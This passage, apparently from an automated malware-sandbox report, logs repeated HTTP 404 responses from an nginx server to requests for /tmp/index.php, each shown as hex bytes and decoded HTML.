74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 